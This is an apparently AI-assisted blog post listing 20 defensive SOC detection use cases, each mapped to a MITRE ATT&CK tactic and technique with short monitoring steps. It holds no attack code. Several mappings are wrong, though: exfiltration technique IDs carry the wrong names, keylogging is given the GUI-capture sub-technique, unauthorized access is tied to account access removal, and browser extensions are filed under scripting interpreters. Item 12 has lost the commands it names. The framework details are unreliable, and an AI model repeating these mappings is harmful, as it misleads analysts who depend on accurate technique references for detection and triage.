I'm not the Xpert - SOC - 200 Use Cases Learning Resource for Cybersecurity Analysts! Part 1
TLDR;
I'm starting these learning posts to give back. I have been in the IT industry and have used many resources rewritten by fellows, which have helped me along my journey. I would leverage AI to generate the content, which can ease the pain of looking for information and help me learn faster than going through hundreds of hours of training and blogs.
In this post, I aim to bring Izzmier Izzuddin Zulkepli's work to life with an extra layer of accessibility and learning potential by integrating GenAI capabilities. For every one of the 200 must-know use cases for cybersecurity analysis, I’ve linked them to the MITRE ATT&CK framework—a treasure trove of techniques, tactics, and procedures (TTPs) that form the backbone of modern cybersecurity strategies.
By doing so, I hope to make it easier for cybersecurity professionals, whether you’re an L1 just starting or an experienced L2 or L3 analyst, to understand better how these use cases connect to real-world adversarial behaviour. This mapping also provides an opportunity to access curated learning resources, accelerating your ability to master each use case without wading through mountains of content.
What You’ll Find in This Resource:
Actionable Use Cases: Each of the 200 use cases has been categorized and explained in detail, making them easy to reference during day-to-day operations or incident response.
MITRE ATT&CK Integration: Each use case is mapped to specific ATT&CK techniques, offering a structured way to understand adversarial behaviour.
Learning Resources: I’ve leveraged AI to generate summaries, link relevant blogs, courses, and documentation, and even include short AI-powered explainers where applicable.
Why This Matters:
In cybersecurity, context is king. The SOC environment is fast-paced, and analysts don’t always have the time to piece together how a particular alert or scenario ties back to a broader attack strategy. This resource gives you an all-in-one guide to deepen your knowledge and improve your analysis capabilities.
Example Use Case:
Let me give you a quick example of how this works:
Use Case #45: Detect Unauthorized Access to Cloud Resources
MITRE ATT&CK Techniques: T1078 (Valid Accounts), T1531 (Account Access Removal)
Description: This use case identifies unauthorized access or privilege escalation patterns in cloud environments like AWS or Azure.
Learning Resource: Links to AWS CloudTrail and Azure Monitor logs setup guides, a YouTube video explaining cloud security fundamentals, and a curated list of labs on platforms like TryHackMe or Hack The Box.
Collaboration and Feedback:
This post is not the end-all-be-all but a starting point. I welcome the community's feedback, additions, and suggestions to make this resource as comprehensive and helpful as possible.
I’ll share the first 20 use cases in this post and release more in the coming weeks. If you’re passionate about learning, cybersecurity, and giving back, let’s connect and collaborate to make the journey more manageable for the next wave of professionals.
1. Detection of Abnormal Device Enrollment in MDM
MITRE Tactic: Initial Access
Technique ID: T1078
Technique Name: Valid Accounts
Steps: Monitor MDM enrollment logs. Detect unapproved devices. Alert and block unauthorized activity.
Key Insight: Protects against rogue devices infiltrating corporate networks.
Resource: https://attack.mitre.org/techniques/T1078/
2. Detection of Unauthorized SSH Access to Cloud Instances
MITRE Tactic: Initial Access
Technique ID: T1078
Technique Name: Valid Accounts
Steps: Monitor SSH logs for access attempts from unknown IPs.Correlate with user activity. Alert and block unauthorized sessions.
Key Insight: Prevents unauthorized access to cloud resources.
Resource: https://attack.mitre.org/techniques/T1078/
3. Detection of SQL Injection Attacks
MITRE Tactic: Initial Access
Technique ID: T1190
Technique Name: Exploit Public-Facing Application
Steps: Monitor weblogs for SQL payloads. Detect anomalies using threat intelligence. Alert and block malicious traffic.
Key Insight: Protects web applications from database exploitation attempts.
Resource: https://attack.mitre.org/techniques/T1190/
4. Detection of Phishing URLs in Emails
MITRE Tactic: Initial Access
Technique ID: T1566
Technique Name: Phishing
Steps: Analyze email content for flagged URLs.Quarantine suspicious emails. Alert users and administrators.
Key Insight: Defends against credential theft through phishing emails.
Resource: https://attack.mitre.org/techniques/T1566/
5. Detection of Unauthorized Script Execution
MITRE Tactic: Execution
Technique ID: T1059
Technique Name: Command and Scripting Interpreter
Steps: Monitor script logs for unauthorized executions. Detect modifications or anomalies. Alert and isolate affected systems.
Key Insight: Identifies and prevents malicious script activities.
Resource: https://attack.mitre.org/techniques/T1059/
6. Detection of Encoded PowerShell Commands
MITRE Tactic: Execution
Technique ID: T1059.001
Technique Name: PowerShell
Steps: Monitor for Base64-encoded commands in PowerShell logs.Correlate with system activity.Alert and investigate suspicious patterns.
Key Insight: Detects obfuscated malicious activities in PowerShell.
Resource: https://attack.mitre.org/techniques/T1059/001/
7. Detection of Suspicious Browser Extensions
MITRE Tactic: Execution
Technique ID: T1059
Technique Name: Command and Scripting Interpreter
Steps: Monitor browser extension installations. Detect unauthorized or malicious ones. Alert and remove risky extensions.
Key Insight: Prevents malicious browser extensions from compromising sensitive data.
Resource: https://attack.mitre.org/techniques/T1059/
8. Detection of Unauthorized Remote Access Tools
MITRE Tactic: Execution
Technique ID: T1219
Technique Name: Remote Access Software
Steps: Monitor system installations for remote access tools. Detect unauthorized tools like AnyDesk or TeamViewer. Alert and block malicious activity.
Key Insight: Prevents lateral movement through unauthorized remote access tools.
Resource: https://attack.mitre.org/techniques/T1219/
9. Detection of Exploit Attempts on Web Servers
MITRE Tactic: Initial Access
Technique ID: T1190
Technique Name: Exploit Public-Facing Application
Steps: Monitor traffic for exploit patterns targeting web servers. Block malicious IPs. Alert and investigate.
Key Insight: Protects against web server vulnerabilities being exploited.
Resource: https://attack.mitre.org/techniques/T1190/
10. Detection of Unauthorized RDP Sessions
MITRE Tactic: Lateral Movement
Technique ID: T1021.001
Technique Name: Remote Services
Steps: Monitor RDP session logs. Detect logins from unapproved users. Alert and block unauthorized access.
Key Insight: Prevents attackers from accessing internal systems via RDP.
Resource: https://attack.mitre.org/techniques/T1021/001/
11. Detection of Suspicious Keylogging Tools
MITRE Tactic: Credential Access
Technique ID: T1056.002
Technique Name: Input Capture
Steps: Monitor processes capturing user input. Detect unauthorized tools. Alert and isolate systems.
Key Insight: Safeguards credentials from being stolen through keylogging.
Resource: https://attack.mitre.org/techniques/T1056/002/
12. Detection of Network Enumeration Activities
MITRE Tactic: Discovery
Technique ID: T1016
Technique Name: System Network Configuration Discovery
Steps: Monitor commands like or .Detect unauthorized usage. Alert and block reconnaissance attempts.
Key Insight: Prevents reconnaissance activities in the network.
Resource: https://attack.mitre.org/techniques/T1016/
13. Detection of Suspicious Log Deletions
MITRE Tactic: Defense Evasion
Technique ID: T1070.004
Technique Name: Indicator Removal on Host
Steps: Detect log clearing commands. Analyze repetitive patterns of log deletion. Alert and investigate.
Key Insight: Identifies attempts to cover tracks by clearing logs.
Resource: https://attack.mitre.org/techniques/T1070/004/
14. Detection of Suspicious HTTP Traffic
MITRE Tactic: Command and Control
Technique ID: T1071.001
Technique Name: Application Layer Protocol
Steps: Monitor HTTP headers for anomalies. Detect unusual user-agent strings. Alert and block suspicious connections.
Key Insight: Identifies malware communications using HTTP.
Resource: https://attack.mitre.org/techniques/T1071/001/
15. Detection of Unauthorized Network Scans
MITRE Tactic: Discovery
Technique ID: T1046
Technique Name: Network Service Discovery
Steps: Analyze traffic for scanning patterns. Detect unauthorized port sweeps. Alert and block malicious traffic.
Key Insight: Prevents attackers from mapping the network.
Resource: https://attack.mitre.org/techniques/T1046/
16. Detection of Unauthorized File Modifications
MITRE Tactic: Impact
Technique ID: T1485
Technique Name: Data Destruction
Steps: Monitor file modification logs. Detect unexpected changes or deletions. Alert and investigate.
Key Insight: Protects critical files from being tampered with.
Resource: https://attack.mitre.org/techniques/T1485/
17. Detection of Suspicious FTP Transfers
MITRE Tactic: Exfiltration
Technique ID: T1048.003
Technique Name: Exfiltration Over Web
Steps: Monitor FTP activity for large file transfers.Block transfers to unknown servers.Alert administrators.
Key Insight: Prevents sensitive data leaks over FTP.
Resource: https://attack.mitre.org/techniques/T1048/003/
18. Detection of Unauthorized Cron Jobs
MITRE Tactic: Execution
Technique ID: T1053.003
Technique Name: Scheduled Task/Job
Steps: Monitor cron job logs. Detect unauthorized entries. Alert and block.
Key Insight: Prevents attackers from maintaining persistence via cron jobs.
Resource: https://attack.mitre.org/techniques/T1053/003/
19. Detection of Suspicious File Encryption
MITRE Tactic: Impact
Technique ID: T1486
Technique Name: Data Encrypted for Impact
Steps: Monitor file encryption patterns. Detect unusual spikes in activity. Alert and isolate systems.
Key Insight: Detects ransomware encryption activities.
Resource: https://attack.mitre.org/techniques/T1486/
20. Detection of Large Data Transfers to Cloud
MITRE Tactic: Exfiltration
Technique ID: T1567.002
Technique Name: Exfiltration Over Network Medium
Steps: Monitor upload sizes to cloud storage. Detect unusual spikes in transfer activity. Block unauthorized transfers and alert administrators.
Key Insight: Prevents data exfiltration through cloud applications.
Resource: https://attack.mitre.org/techniques/T1567/002/
Conclusion
The journey to mastering cybersecurity is never-ending, but having actionable resources makes all the difference. These 200 must-know use cases aim to bridge the gap between understanding and applying cybersecurity tactics in your daily SOC operations.
Next Steps:
You can save this resource and explore the mapped MITRE ATT&CK tactics.
Could you share your feedback in the comments to help improve and expand this effort?
Spread the knowledge—share this with your team and peers.
What’s Coming Next: In the next post, I’ll share 20 more use cases, complete with MITRE ATT&CK mappings and practical learning resources. Follow me for updates, and let’s grow together as a community!
#CyberSecurity #SOC #ThreatDetection #CyberThreats #MITREATTACK #InfoSec #IncidentResponse #NetworkSecurity #CyberSecurityAnalyst #DataProtection #Tech #ArtificialIntelligence #GenAI #AIinCyberSecurity #ITInfrastructure #CloudSecurity #DigitalTransformation #Technology #CyberSecurityCommunity #LearningTogether #KnowledgeSharing #ProfessionalDevelopment #TeamWork #ContinuousLearning #Innovation #FutureOfWork #IT